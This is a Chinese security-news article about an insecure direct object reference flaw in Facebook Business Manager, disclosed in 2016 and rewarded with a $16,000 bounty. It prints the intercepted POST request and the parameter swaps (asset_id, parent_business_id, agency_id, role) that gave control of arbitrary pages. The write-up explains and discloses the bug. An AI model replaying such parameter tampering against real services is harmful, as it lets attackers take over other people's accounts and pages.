自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

十秒內(nèi)黑掉Facebook主頁(yè)?這個(gè)漏洞竟然價(jià)值1.6萬(wàn)美金(含漏洞分析)

安全 漏洞
Sureshkumar在Facebook的企業(yè)管理平臺(tái)中發(fā)現(xiàn)了一個(gè)IDOR(InsecureDirect Object References)漏洞,而在這個(gè)漏洞的幫助下,他可以在十秒之內(nèi)獲取到任意Facebook主頁(yè)的控制權(quán)。

[[171789]]

如何黑掉你的Facebook?這位來(lái)自印度的安全研究專家表示有話要說(shuō)。根據(jù)國(guó)外媒體的最新報(bào)道,一位名叫ArunSureshkumar的印度安全專家在Facebook的“企業(yè)管理平臺(tái)”(BusinessManager)中發(fā)現(xiàn)了一個(gè)嚴(yán)重的漏洞,攻擊者可以利用該漏洞來(lái)攻擊任何人的Facebook主頁(yè)。

Facebook的企業(yè)管理平臺(tái)(BusinessManager)是什么?

“企業(yè)管理平臺(tái)”可以幫助企業(yè)、廣告代理商、或行銷人員在統(tǒng)一界面下集中管理企業(yè)旗下的Facebook主頁(yè)、廣告賬號(hào)、以及付款方式,從而避免了管理人員需要不斷切換界面的尷尬局面。

[[171790]]

大型企業(yè)旗下通常會(huì)有多個(gè)Facebook粉絲主頁(yè),而這些主頁(yè)又各自有不同的市場(chǎng)定位和目標(biāo)。對(duì)于企業(yè)管理者而言,“企業(yè)管理平臺(tái)”可以幫助他們?cè)谕唤缑嫦鹿芾硭械姆劢z專頁(yè)和廣告賬號(hào),不僅如此,他們還可以查看、移除、或變更相應(yīng)用戶的權(quán)限。

而各個(gè)Facebook粉絲專頁(yè)的管理者可以登入“企業(yè)管理平臺(tái)”,并直接訪問(wèn)廣告賬號(hào)和主頁(yè)的各種信息。此時(shí)并不會(huì)向雇主顯示所有的Facebook個(gè)人資料,僅會(huì)顯示姓名、公司名稱、以及廣告賬號(hào)等信息,所以管理者不必?fù)?dān)心需要將工作上接觸的人加為Facebook好友。

不安全的直接對(duì)象引用

在我們對(duì)這一攻擊技術(shù)進(jìn)行分析之前,請(qǐng)?jiān)试S我先給大家介紹一下“不安全的直接對(duì)象引用”的概念。

根據(jù)OWASP項(xiàng)目(開(kāi)放式Web應(yīng)用程序安全項(xiàng)目)所提供的定義,當(dāng)一個(gè)Web應(yīng)用程序可以根據(jù)用戶提供的輸入信息來(lái)向用戶提供對(duì)象的直接訪問(wèn),那么這就是一種不安全的直接對(duì)象引用。這個(gè)漏洞的存在,將允許攻擊者繞過(guò)系統(tǒng)的身份驗(yàn)證機(jī)制,并直接訪問(wèn)到網(wǎng)絡(luò)系統(tǒng)中的所有資源。

根據(jù)OWASP項(xiàng)目官方提供的信息

“不安全的直接對(duì)象引用將允許攻擊者繞過(guò)系統(tǒng)的身份驗(yàn)證機(jī)制,并可以通過(guò)修改對(duì)象的引用參數(shù)值來(lái)直接訪問(wèn)系統(tǒng)資源。這些資源有可能是屬于其他用戶的數(shù)據(jù)庫(kù)數(shù)據(jù),也有可能是存儲(chǔ)在文件系統(tǒng)中的文件。如果Web應(yīng)用程序在沒(méi)有對(duì)用戶的輸入數(shù)據(jù)進(jìn)行安全檢測(cè)的情況下直接向用戶提供了請(qǐng)求對(duì)象的訪問(wèn)權(quán)限,那么就會(huì)出現(xiàn)這種不安全的情況。”

Facebook漏洞分析

Sureshkumar在Facebook的企業(yè)管理平臺(tái)中發(fā)現(xiàn)了一個(gè)IDOR(InsecureDirect Object References)漏洞,而在這個(gè)漏洞的幫助下,他可以在十秒之內(nèi)獲取到任意Facebook主頁(yè)的控制權(quán)。

Sureshkumar用他的Facebook賬號(hào)(ID=907970555981524)添加了一個(gè)測(cè)試賬號(hào)(作為partner賬號(hào)),這個(gè)partner賬號(hào)的ID為991079870975788。他在測(cè)試中使用了BurpSuite來(lái)攔截Facebook的網(wǎng)絡(luò)請(qǐng)求信息,并且修改了請(qǐng)求中的部分?jǐn)?shù)據(jù)。

Sureshkumar在他發(fā)表的分析報(bào)告中公布了包含漏洞的網(wǎng)絡(luò)請(qǐng)求數(shù)據(jù):

  1. POST /business_share/asset_to_agency/?dpr=2 HTTP/1.1 
  2. Host: business.facebook.com 
  3. Connectionclose 
  4. Content-Length: 436 
  5. Origin: https://business.facebook.com 
  6. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 
  7. Content-Type: application/x-www-form-urlencoded 
  8. Accept: */* 
  9. Referer:https://business.facebook.com/settings/pages/536195393199075?business_id=907970555981524 
  10. Accept-Encoding: gzip, deflate, br 
  11. Accept-Language: en-US,en;q=0.8 
  12. Cookie: rc=2; datr=AWE3V–DUGNTOAy0wTGmpAXb; locale=en_GB;sb=BWE3V1vCnlxJF87yY9a8WWjP; pl=n; lu=gh2GPBnmZY1B1j_7J0Zi3nAA;c_user=100000771680694; xs=25%3A5C6rNSCaCX92MA%3A2%3A1472402327%3A4837;fr=05UM8RW0tTkDVgbSW.AWUB4pn0DvP1fQoqywWeORlj_LE.BXN2EF.IL.FfD.0.0.BXxBSo.AWXdKm2I;csm=2; s=Aa50vjfSfyFHHmC1.BXwxOY; _ga=GA1.2.1773948073.1464668667; p=-2;presence=EDvF3EtimeF1472469215EuserFA21B00771680694A2EstateFDutF1472469215051CEchFDp_5f1B00771680694F7CC;act=1472469233458%2F6 
  13. parent_business_id=907970555981524&agency_id=991079870975788&asset_id=536195393199075&role=MANAGER&__user=100000771680694&__a=1&__dyn=aKU-XxaAcoaucCJDzopz8aWKFbGEW8UhrWqw-xG2G4aK2i8zFE8oqCwkoSEvmbgcFV8SmqVUzxeUW4ohAxWdwSDBzovU-eBCy8b48xicx2aGewzwEx2qEN4yECcKbBy9onwFwHCBxungXKdAw&__req=e&__be=-1&__pc=PHASED%3Abrands_pkg&fb_dtsg=AQHoLGh1HUmf%3AAQGT4fDF1-nQ&ttstamp=265817211176711044972851091025865817184521026870494511081&__rev=2530733 

那么拿到這些數(shù)據(jù)之后,怎么才能攻擊Facebook主頁(yè)呢?

他用目標(biāo)Facebook賬號(hào)的ID值替換了請(qǐng)求數(shù)據(jù)中“asset_id”參數(shù)值,然后交換了“parent_business_id”和“agency_id”的值。除此之外,他還將“role”參數(shù)的值修改成了“MANAGER”。

  1. parent_business_id= 991079870975788 
  2. agency_id= 907970555981524 
  3. asset_id =190313461381022 
  4. role= MANAGER 

通過(guò)上述這一系列操作之后,Sureshkumar演示了如何攻擊Facebook主頁(yè),并獲取到了企業(yè)管理平臺(tái)頁(yè)面的管理員權(quán)限。除此之外,Sureshkumar還發(fā)布了一段攻擊演示視頻。

PoC視頻:

https://youtu.be/BSnksWX5Kn0 

結(jié)束語(yǔ)

[[171791]]

這位來(lái)自印度的安全研究專家于2016年8月29日正式將該漏洞提交給了Facebook。Facebook的安全技術(shù)人員對(duì)該漏洞進(jìn)行了分析,并且在調(diào)查過(guò)程中還意外發(fā)現(xiàn)了平臺(tái)中的另外一個(gè)安全漏洞。

根據(jù)Facebook的漏洞獎(jiǎng)勵(lì)計(jì)劃,這位社交網(wǎng)絡(luò)中的巨頭向Sureshkumar提供了一萬(wàn)六千美元的漏洞獎(jiǎng)金。這個(gè)漏洞竟然價(jià)值1.6萬(wàn)美金,請(qǐng)問(wèn)各位BugHunter心動(dòng)了嗎?

責(zé)任編輯:武曉燕 來(lái)源: FreeBuf
相關(guān)推薦

2015-10-22 23:14:54

2012-03-08 09:18:29

2009-05-22 15:46:09

Facebook應(yīng)用驗(yàn)證漏洞

2020-06-02 14:28:46

漏洞黑客網(wǎng)絡(luò)攻擊

2012-02-29 09:22:19

2021-03-04 14:55:50

微軟漏洞黑客

2013-03-15 10:15:21

2016-03-10 20:00:57

2024-09-27 15:57:08

2024-05-06 10:11:51

2014-12-03 10:37:45

2021-02-23 10:43:42

Facebook Ga

2022-01-04 08:33:33

Kafka消息發(fā)送

2015-02-06 15:51:11

2017-11-23 10:47:47

2015-08-14 13:37:46

DEFCON磁盤安全

2021-01-27 10:35:23

漏洞安全KindleDrip攻

2018-01-26 10:10:45

Linux服務(wù)器性能

2022-07-27 15:50:55

漏洞網(wǎng)絡(luò)攻擊

2021-08-31 10:39:52

語(yǔ)音克隆MockingBird合成器
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)